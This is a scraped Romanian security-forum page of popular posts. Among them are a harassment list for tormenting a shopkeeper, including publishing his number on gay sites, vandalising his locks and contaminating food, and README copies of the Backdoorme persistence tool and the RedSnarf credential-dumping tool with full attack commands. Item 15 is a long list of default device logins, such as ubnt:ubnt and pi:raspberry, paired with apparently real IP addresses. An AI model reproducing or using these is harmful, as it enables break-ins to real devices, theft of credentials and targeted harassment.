Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 01/08/17 in all areas

  1. Pai daca aia vad un retardat cu ceva ce seamana cu o arma, cred si eu ca se alarmeaza
    5 points
  2. Furnizorii de acolo au succes pentru ca vand hardware folosit. Serverul este ca o masina, trebuie sa aibe rodajul facut. Nici nu as cumpara un server brand new care nu are rodajul facut, sa ma trezesc cu șpan de la strung sau cu suruburi sarite.
    3 points
  3. Aveti grija cu ei, dupa ce cumperi domeniul nu o sa te mai lase sa intri in cont, poti sa dai 1000 de tickete si sa restezi parola tot de atatea ori.
    2 points
  4. Eu nu pricep ce e cu leaseweb acolo. 1. nu e furnizor roman 2. nu are de unde sa stie el daca hardware-ul e folosit sau nu. Ma indoiesc ca arunca cineva un server nou dupa ce l-a folosit clientul 3 luni. Doar nu e prezervativ.
    2 points
  5. https://www.udemy.com/ios-10-bootcamp-swift-objective-c-tutorial/?couponCode=IOS10LIMITEDD https://www.udemy.com/kali-linux-hacking/?couponCode=BESTBLACKHAT https://www.udemy.com/the-ethical-hacking-starter-kit-/?couponCode=2000FREE https://www.udemy.com/penetration-testing/?couponCode=WOO052816 https://www.udemy.com/androidcourse/?couponCode=ANDROIDFREE https://www.udemy.com/the-complete-jenkins-course-for-developers-and-devops/?couponCode=FR0002
    2 points
  6. - Gsm jammer. Nu iti mai merg nici tie mobilele nici lui. - Platesti niste boschetari sa stea tot timpul pe acolo pe capul lui. - Cumperi tuica de la piata si aduci niste drojdieri sa stea in cur la el pe scara in fata buticului. - Faci comenzi la sicrie, coroane de morti si tot felul de astea pe adresa lui. - Te caci noaptea la el in fata usii si lasi un postit cu "La multi ani" scris pe el. - Te plimbi prin fata buticului scarpinandu-te la pula in semn de dispret. Daca vine politia, nu are ce-ti face. E ceva normal sa te manance la pula. - Publica-i mosului numarul de telefon pe 400 de comunitati gay impreuna cu descrieri frumoase ca e pasiv, ca presteaza, etc. Poti sa spui ca e curvostina si panarama penala si sa-i publici anuntul pe o gramada de site-uri. - Suna cu numar ascuns diversi GAY de pe forumuri si da-ti intalnire cu ei, in numele lui :))) - Pune-i cacat pe cleanta. - Baga-i scobitori cu super glue in incuietori. - Ce comenzi onoreza ? Daca e ceva de mancare, fa laba pe ele si mergi cu ele la analize, reclama-l peste tot. - Daca serveste ceva la masa. Pune niste tovarasi sa comande ceva si sa puna in mancare fire de par si tot felul de cacaturi si sa sara ca fripti de la mese, sa incepe sa se vaicareasca tare sa auda si ceilalalti clienti.
    2 points
  7. PHP Secure Configuration Checker Check current PHP configuration for potential security flaws. Simply access this file from your webserver or run on CLI. Author This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks. Link: https://github.com/sektioneins/pcc
    1 point
  8. Strainul are o vorba: "better safe than sorry". In afara ca te-au oprit si legitimat doar nu ti-au facut nimic. Te-as intreba pe tine ce ai face daca ai fi in locul lor dar cum nu esti cu toti boii acasa ii intreb pe cei de aici: daca ati fi gabori si mergeti pe strada si vedeti pe unul care are antecedente si in instruire sunteti pregatiti sa luati acestea in considerare si il vedeti cu ceva ce par a fi arme, chiar daca ar fi si pistoale cu apa: il lasati sa-si vada in continuare de drum sperand ca nu-l vedeti mai apoi la stirile de la 5pm sau il intrebati de sanatate? Esti doar un attention whore
    1 point
  9. Hai man, tu ai 5.56 el are 6mm (evident, bilute) :))))))) Ai vazut ca am avut si eu tragere de revelion, hahaha
    1 point
  10. Si cand te gandesti ca altii se joaca cu famas-ul... :-)) @aelius nu e asa? :-))
    1 point
  11. Sa suga ciotu de la mazilu serghey, numa daca te pui sa cauti despre hetnix apare pe 1032103012301 de forumuri ))
    1 point
  12. Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained. Please only use Backdoorme with explicit permission - please don't hack without asking. Usage Backdoorme is split into two parts: backdoors and modules. Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety. Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence. Demonstration: Setup To start backdoorme, first ensure that you have the required dependencies. For Python 3.5+: $ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/ $ virtualenv --python=python3.5 env $ source env/bin/activate (env) $ pip install -r requirements.txt For Python 2.7: $ sudo python dependencies.py Getting Started Launching backdoorme: $ python master.py To add a target: >> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >> Backdoors To use a backdoor, simply run the "use" keyword. >> use shell/metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >> From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword. (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False ... (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ... As in metasploit, backdoors are organized by category. Auxiliary keylogger - Adds a keylogger to the system and gives the option to email results back to you. simplehttp - installs python's SimpleHTTP server on the client. user - adds a new user to the target. web - installs an Apache Server on the client. Escalation setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unpriviledged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor. shell - the shell backdoor is a priviledge escalation backdoor, similar to (but more specific than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unpriviledged user, simply run ".bash -p", and you will have root access. Shell bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash. bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side. sh - Similar to the first bash backdoor, but redirects input to /bin/sh. sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh. metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell. java - creates a socket connection using libraries from Java and compiles the backdoor on the target. ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash. netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell. netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell. perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous. php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module python - uses a short python script to perform commands and send output back to the user. web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor. Access remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces. ssh_key - creates RSA key and copies to target for a passwordless ssh connection. ssh_port - Adds a new port for ssh. Windows windows - Uses msfvenom to create a windows backdoor. Modules Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword. (msf) >> add poison + Poison module added Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options. (msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False Currently enabled modules include: Poison Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently. Cron Adds an existing backdoor to the root user's crontab to run with a given frequency. Web Sets up a web server and places a web page which triggers the backdoor. Simply visit the site with your listener open and the backdoor will begin. User Adds a new user to the target. Startup Allows for backdoors to be spawned with the bashrc and init files. Whitelist Whitelists an IP so that only that IP can connect to the backdoor. Targets Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available. Contributing Backdoorme is still very much in its infancy! Feel free to contribute to the project - simply fork it, make your changes, and issue a pull request. Have an idea for a killer backdoor, or something we could improve? Make an issue and we'll add it ASAP! Please email us at backdoormegit@gmail.com with any questions. If you wish to add your own backdoor, follow the directions given in the backdoorme/backdoors/template.py file. If you wish to add your own module, follow the directions given in the backdoorme/modules/template.py file. Cheat Sheet for developers: Execute command on system: self.core.curtarget.ssh.exec_command("command") Retrieve an option: self.get_value("option") Execute command on system with root: self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S command") Source: https://github.com/Kkevsterrr/backdoorme
    1 point
  13. Domnul balls, rusine (muie) tie pentru ca dupa ce ai o gandire limitata, te mai si inflamezi ca fundul unei scroafe in calduri. Prostul daca nu-i fudul, nu-i prost destul. Partea tehnica nu e singurul considerent ci sunt multe altele: - quality assurance (controlul calitatii): Chiar daca sunt facute tot in China sau orice alta tara asemanatoare, companiile gen Google, Apple, Samsung, etc - au procedee de control al calitatii mult mai bine definite, controlate si impuse si standarde ridicate. Nu la fel poate fi spus despre restul firmelor de "Chicken chow mein" si "Irinel si balanel" - marketing: Cand o companie "noname" da cu bata in balta are un efect mult mai mic fata de o companie cu market share ridicat, mai ales ca multe din ele nici nu sunt listate la bursa. Cand se intampla nasoale la o firma mare (gen Samsung recent) erau trambitate stirile pe toate canalele media (scrisa, radio, tv, online). Dar cand o sfecleste o firma "noname" de abia scrie pe un site/blog amarat. Restul nu isi permit sa faca greseli majore. - legislatie: Tinand cont ca multi demnitari (ministri, parlamentari, guvern, executiv, etc.) folosesc astfel de produse, ma indoiesc ca o tara ar permite comercializarea in masa a unor astfel de produse cu buna stiinta ca au backdoor catre alte tari. Din contra, de exemplu guvernul US ar vrea sa aiba ei treburile lor instalate pe produsele Apple daca ar putea. - patents: Pe un singur model sunt enorm de multe patente si secrete de productie care nu sunt neaparat cunoscute celorlalte firme mici. Companiile gen Google, Samsung, Apple, etc. au invatat din multe greseli de productie - cele noi inca au de invatat. - consumer behaviour: Am amici chinezi, lucrez cu ei, etc. si cunosc bine acest lucru: In China, Japonia si restul pietelor din jur exista un obicei la tineri sa schimbe telefoanele mult mai des fata de Europa. Nu m-am uitat dupa research dar probabil media e undeva la 2-3 telefoane / an. So, avand un astfel de target customer de ce ai face telefoane mai durabile si de calitate si te chinui si investesti in telefoane care sa tina 3 ani cand ei le schimba dupa 7-8 luni. - premium / emerging customers: Calitatea produselor este definita si de zonele unde sunt vandute. Acelasi telefon care e vandut in UK va avea o anumita calitate, vandut in Ukraina va avea o alta calitate is vandut in Gambia o alta. La fel si cu hainele, se vede calitatea aproape instant (sau dupa prima spalare) chiar daca toate sunt facute in Bangladesh/Pakistan. Cand produsul este vandut unei tari care are legi bine definite de returnare, asteptarile clientilor sunt ridicate si isi permit sa plateasca premium - li se livreaza ce-i mai bun. Restul primesc mai la noroc. Inca in tarile arabe anumite produse au specificatia in magazin: facute pentru Europa si facute pentru Middle East! Si lista poate continua...
    1 point
  14. ______ .____________ _____ \______ \ ____ __| _/ _____/ ____ _____ ________/ ____\ | _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\ | | \ ___// /_/ |/ \ | \/ __ \| | \/| | |____|_ /\___ >____ /_______ /___| (____ /__| |__| \/ \/ \/ \/ \/ \/ RedSnarf is a pen-testing / red-teaming tool by Ed William and Richard Davy for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques. RedSnarf functionality includes: • Retrieval of local SAM hashes; • Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password; • Retrieval of MS cached credentials; • Pass-the-hash; • Quickly identify weak and guessable username/password combinations (default of administrator/Password01); • The ability to retrieve hashes across a range; • Hash spraying - o Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space; • Lsass dump for offline analysis with Mimikatz; • Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing; • Dumping of Domain controller hashes using the drsuapi method; • Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator'; • Ability to decrypt cpassword hashes; • Ability to start a shell on a remote machine; • The ability to clear the event logs (application, security, setup or system); (Internal Version only) • Results are saved on a per-host basis for analysis. • Enable/Disable RDP on a remote machine. • Change RDP port from 3389 to 443 on a remote machine. • Enable/Disable NLA on a remote machine. • Find where users are logged in on remote machines. • Backdoor Windows Logon Screen • Enable/Disable UAC on a remote machine. • Stealth mimikatz added. • Parsing of domain hashes • Ability to determine which accounts are enabled/disabled RedSnarf Usage ======================= Requirements: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - used with parsing Mimikatz info locally Show Help ./redsnarf.py -h ./redsnarf.py --help Retrieve Local Hashes ======================= Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log ./redsnarf.py -H ip=10.0.0.50 -uC security Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log ./redsnarf.py -H ip=10.0.0.50 -uC application Retrieve Local Hashes from a single machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . Retrieve Local Hashes from a single machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com Retrieve Hashes across a network range using local administrator credentials ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d . Retrieve Hashes across a network range using domain administrator credentials ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com Retrieve Hashes across a network range using domain administrator credentials ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com Hash Spraying ======================= Spray Hashes across a network range ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d . Retrieve Hashes across a network range domain login ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com Quickly Check Credentials ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y Quickly Check File containing usernames (-hS) and a generic password (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y Retrieve Domain Hashes ======================= Retrieve Hashes using drsuapi method (Quickest) This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y) Retrieve Hashes using NTDSUtil This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y) Information Gathering ======================= Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y Decrypt Cpassword ./redsnarf.py -uG cpassword Find User - Live /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name Find User - Offline (searches pre downloaded information) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name Misc ======================= Start a Shell on a machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y Start a Shell on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y Run stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded machine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y Run Custom Command Example 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user' Example 2 - Double Quotes need to be escaped with \ ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name \"domain admins\" | dsget group -members -expand' Local Access Token Policy Creates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings. ./redsnarf.py -rL y Wdigest Enable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e Disable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d Query UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q UAC Enable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e Disable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d Query UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q Backdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate Enable Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e Disable Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d Query Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q RDP ======================= RDP Enable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e Disable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d Query RDP status on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q Change RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e Change RDP Port to default of 3389 on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d Query RDP Port Value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q NLA ======================= Enable NLA on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e Disable NLA on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d Query NLA status on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q Sursa: https://github.com/nccgroup/redsnarf
    1 point
  15. ts:ts:173.217.247.91 ubnt:ubnt:73.134.253.166 ubnt:ubnt:73.137.185.48 ubnt:ubnt:73.159.253.162 ubnt:ubnt:73.12.239.170 ubnt:ubnt:73.131.219.246 ubnt:ubnt:73.149.83.81 ubnt:ubnt:73.1.134.80 ubnt:ubnt:73.139.171.12 ubnt:ubnt:73.153.224.92 ubnt:ubnt:73.189.9.185 ubnt:ubnt:73.192.98.204 ubnt:ubnt:73.158.250.239 pi:raspberry:73.11.43.59 ubnt:ubnt:73.193.4.44 ubnt:ubnt:73.157.208.104 pi:raspberry:73.187.4.83 ubnt:ubnt:73.18.107.168 ubnt:ubnt:73.185.132.63 pi:raspberry:73.185.132.63 pi:raspberry:73.183.4.235 pi:raspberry:73.185.72.8 ubnt:ubnt:73.192.68.238 pi:raspberry:73.20.34.164 ubnt:ubnt:73.155.199.138 ubnt:ubnt:73.210.232.131 ubnt:ubnt:73.207.161.62 pi:raspberry:73.187.192.84 ubnt:ubnt:73.25.178.190 ubnt:ubnt:73.222.111.208 pi:raspberry:73.223.174.200 ubnt:ubnt:73.223.134.170 pi:raspberry:73.222.19.109 pi:raspberry:73.3.91.162 ubnt:ubnt:73.208.187.26 ubnt:ubnt:73.237.0.24 pi:raspberry:73.21.71.254 ubnt:ubnt:73.196.248.59 ubnt:ubnt:73.42.216.185 ubnt:ubnt:73.49.40.102 ubnt:ubnt:73.54.122.222 ubnt:ubnt:73.4.20.53 ubnt:ubnt:73.52.172.53 ubnt:ubnt:24.10.183.246 ubnt:ubnt:73.166.54.117 ubnt:ubnt:73.39.226.80 ubnt:ubnt:24.102.233.173 ubnt:ubnt:73.206.69.194 ubnt:ubnt:24.107.124.235 ubnt:ubnt:73.34.53.217 ubnt:ubnt:24.107.201.24 ubnt:ubnt:24.111.38.7 ubnt:ubnt:24.113.38.195 ubnt:ubnt:24.113.38.194 ubnt:ubnt:24.1.123.94 ubnt:ubnt:24.117.189.72 ubnt:ubnt:24.117.7.191 ubnt:ubnt:24.117.99.59 ubnt:ubnt:24.107.55.228 ubnt:ubnt:24.121.37.49 ubnt:ubnt:73.202.52.105 ubnt:ubnt:24.121.87.254 ubnt:ubnt:24.112.165.109 ubnt:ubnt:24.111.64.90 ubnt:ubnt:24.125.160.224 ubnt:ubnt:24.115.37.190 ubnt:ubnt:24.125.124.53 pi:raspberry:24.132.107.46 ubnt:ubnt:24.130.103.176 ubnt:ubnt:24.136.8.81 ubnt:ubnt:24.134.109.131 ubnt:ubnt:24.13.69.254 pi:raspberry:73.37.90.41 ubnt:ubnt:24.115.98.102 ubnt:ubnt:24.137.224.128 ubnt:ubnt:24.123.146.190 ubnt:ubnt:24.138.155.167 ubnt:ubnt:24.143.162.247 ubnt:ubnt:24.137.174.45 ubnt:ubnt:24.144.20.38 ubnt:ubnt:24.148.22.11 ubnt:ubnt:24.143.5.187 ubnt:ubnt:24.140.98.70 ubnt:ubnt:24.143.114.122 ubnt:ubnt:24.139.83.85 ubnt:ubnt:24.157.191.182 ubnt:ubnt:24.144.17.178 pi:raspberry:24.130.11.101 ubnt:ubnt:24.136.157.155 ubnt:ubnt:24.16.80.209 ubnt:ubnt:24.165.28.192 ubnt:ubnt:24.165.56.216 pi:raspberry:24.163.115.214 ubnt:ubnt:24.166.51.249 ubnt:ubnt:24.170.165.5 ubnt:ubnt:24.173.116.214 ubnt:ubnt:24.178.197.202 ubnt:ubnt:24.176.168.227 ubnt:ubnt:24.179.147.105 ubnt:ubnt:24.180.138.5 ubnt:ubnt:24.18.103.174 ubnt:ubnt:24.181.245.131 ubnt:ubnt:24.189.84.67 ubnt:ubnt:24.189.2.11 PlcmSpIplcmSpIp:24.186.76.1 ubnt:ubnt:24.19.121.191 pi:raspberry:24.179.245.117 pi:raspberry:24.192.10.234 ubnt:ubnt:24.19.220.50 ubnt:ubnt:24.202.112.11 ubnt:ubnt:24.206.11.213 ubnt:ubnt:24.203.26.174 ubnt:ubnt:24.202.219.126 ubnt:ubnt:24.209.12.84 ubnt:ubnt:24.211.125.181 ubnt:ubnt:24.206.29.18 ubnt:ubnt:24.202.34.57 ubnt:ubnt:24.205.28.24 ubnt:ubnt:24.212.48.103 ubnt:ubnt:24.216.93.97 pi:raspberry:24.200.200.215 ubnt:ubnt:24.215.114.214 ubnt:ubnt:24.214.19.24 ubnt:ubnt:24.217.225.244 ubnt:ubnt:24.215.114.46 ubnt:ubnt:24.206.11.158 ubnt:ubnt:24.224.5.95 ubnt:ubnt:24.223.116.35 ubnt:ubnt:24.224.4.103 ubnt:ubnt:24.212.82.88 ubnt:ubnt:24.224.172.238 ubnt:ubnt:24.223.114.32 pi:raspberry:24.214.74.71 ubnt:ubnt:24.196.192.83 ubnt:ubnt:24.231.45.166 ubnt:ubnt:24.230.150.126 ubnt:ubnt:24.230.185.163 ubnt:ubnt:24.235.50.32 ubnt:ubnt:24.238.62.4 ubnt:ubnt:24.227.92.167 ubnt:ubnt:24.238.63.4 ubnt:ubnt:24.237.139.232 ubnt:ubnt:24.240.73.134 ubnt:ubnt:24.244.139.128 ubnt:ubnt:24.242.131.117 ubnt:ubnt:24.246.149.229 ubnt:ubnt:24.245.90.168 pi:raspberry:24.232.131.53 ubnt:ubnt:24.244.163.233 ubnt:ubnt:24.246.182.242 ubnt:ubnt:24.242.222.69 ubnt:ubnt:24.247.198.245 ubnt:ubnt:24.26.241.41 ubnt:ubnt:24.253.125.229 ubnt:ubnt:104.128.195.192 ubnt:ubnt:104.128.195.192 ubnt:ubnt:104.128.195.145 ubnt:ubnt:104.128.194.142 ubnt:ubnt:104.128.195.27 ubnt:ubnt:104.128.200.229 ubnt:ubnt:104.128.200.168 DUP tss:tss:65.116.86.111 DUP adminassword:65.116.86.111 adminefault:65.116.86.111 ubnt:ubnt:73.137.185.48 ubnt:ubnt:73.137.185.48 ubnt:ubnt:73.134.253.166 ubnt:ubnt:73.149.83.81 ubnt:ubnt:73.131.219.246 ubnt:ubnt:73.159.253.162 ubnt:ubnt:73.139.171.12 ubnt:ubnt:73.183.54.207 ubnt:ubnt:73.1.134.80 ubnt:ubnt:73.155.199.138 pi:raspberry:73.11.43.59 ubnt:ubnt:73.157.208.104 ubnt:ubnt:73.189.9.185 ubnt:ubnt:73.157.208.104 ubnt:ubnt:73.153.224.92 ubnt:ubnt:73.158.250.239 ubnt:ubnt:73.166.54.117 pi:raspberry:73.187.4.83 ubnt:ubnt:73.208.187.26 ubnt:ubnt:73.18.107.168 ubnt:ubnt:73.196.248.59 DUP PlcmSpIplcmSpIp:73.185.132.63 DUP pi:raspberry:73.185.132.63 ubnt:ubnt:73.192.68.238 ubnt:ubnt:73.25.178.190 ubnt:ubnt:73.210.232.131 ubnt:ubnt:73.207.161.62 pi:raspberry:73.3.91.162 ubnt:ubnt:73.4.20.53 ubnt:ubnt:73.237.0.24 ubnt:ubnt:73.49.40.102 pi:raspberry:73.223.174.200 ubnt:ubnt:73.54.122.222 ubnt:ubnt:73.52.172.53 ubnt:ubnt:73.223.134.170 pi:raspberry:73.183.4.235 ubnt:ubnt:73.42.216.185 ubnt:ubnt:24.10.183.246 ubnt:ubnt:73.222.111.208 ubnt:ubnt:73.34.53.217 ubnt:ubnt:24.107.201.24 ubnt:ubnt:24.107.124.235 ubnt:ubnt:73.39.226.80 pi:raspberry:73.21.71.254 ubnt:ubnt:24.111.38.7 ubnt:ubnt:24.113.38.195 ubnt:ubnt:24.113.38.194 ubnt:ubnt:24.117.189.72 pi:raspberry:73.37.90.41 pi:raspberry:73.187.192.84 ubnt:ubnt:24.117.7.191 ubnt:ubnt:24.121.37.49 ubnt:ubnt:24.107.55.228 ubnt:ubnt:24.117.99.59 ubnt:ubnt:24.118.83.216 ubnt:ubnt:24.121.87.254 ubnt:ubnt:24.112.165.109 ubnt:ubnt:73.206.69.194 ubnt:ubnt:24.115.98.102 ubnt:ubnt:73.202.52.105 ubnt:ubnt:24.111.64.90 ubnt:ubnt:24.125.160.224 ubnt:ubnt:24.1.123.94 ubnt:ubnt:24.125.124.53 ubnt:ubnt:24.115.37.190 ubnt:ubnt:24.102.233.173 ubnt:ubnt:24.130.103.176 ubnt:ubnt:24.136.157.155 pi:raspberry:24.132.107.46 ubnt:ubnt:24.134.109.131 ubnt:ubnt:24.13.69.254 ubnt:ubnt:24.137.224.128 ubnt:ubnt:24.138.155.167 ubnt:ubnt:24.140.98.70 ubnt:ubnt:24.143.162.247 ubnt:ubnt:24.144.20.38 ubnt:ubnt:24.148.22.11 ubnt:ubnt:24.143.5.187 ubnt:ubnt:24.144.17.178 ubnt:ubnt:24.123.146.190 ubnt:ubnt:24.137.174.45 ubnt:ubnt:24.153.104.35 ubnt:ubnt:24.139.83.85 ubnt:ubnt:24.143.114.122 ubnt:ubnt:24.157.191.182 ubnt:ubnt:24.16.80.209 pi:raspberry:24.130.11.101 pi:raspberry:73.222.19.109 ubnt:ubnt:24.165.28.192 ubnt:ubnt:24.165.56.216 ubnt:ubnt:24.166.51.249 ubnt:ubnt:24.170.165.5 ubnt:ubnt:24.173.116.214 ubnt:ubnt:24.178.197.202 ubnt:ubnt:24.179.147.105 ubnt:ubnt:24.180.138.5 ubnt:ubnt:24.18.103.174 ubnt:ubnt:24.181.245.131 ubnt:ubnt:24.189.2.11 ubnt:ubnt:24.189.84.67 pi:raspberry:24.179.245.117 ubnt:ubnt:24.19.121.191 pi:raspberry:24.192.10.234 ubnt:ubnt:24.19.220.50 ubnt:ubnt:24.202.219.126 ubnt:ubnt:24.202.34.57 ubnt:ubnt:24.206.11.213 ubnt:ubnt:24.202.112.11 ubnt:ubnt:24.203.26.174 ubnt:ubnt:24.205.28.24 ubnt:ubnt:24.206.11.158 ubnt:ubnt:24.212.82.88 ubnt:ubnt:24.212.48.103 ubnt:ubnt:24.206.29.18 ubnt:ubnt:24.211.125.181 pi:raspberry:24.200.200.215 ubnt:ubnt:24.215.114.214 ubnt:ubnt:24.216.93.97 ubnt:ubnt:24.217.225.244 ubnt:ubnt:24.224.5.95 ubnt:ubnt:24.224.4.103 ubnt:ubnt:24.223.114.32 ubnt:ubnt:24.223.116.35 ubnt:ubnt:24.224.172.238 pi:raspberry:24.214.74.71 ubnt:ubnt:24.230.185.163 ubnt:ubnt:24.231.45.166 ubnt:ubnt:24.235.50.32 ubnt:ubnt:24.238.63.4 ubnt:ubnt:24.238.62.4 ubnt:ubnt:24.237.139.232 ubnt:ubnt:24.240.73.134 ubnt:ubnt:24.242.222.69 ubnt:ubnt:24.242.131.117 ubnt:ubnt:24.245.90.168 ubnt:ubnt:24.246.182.242 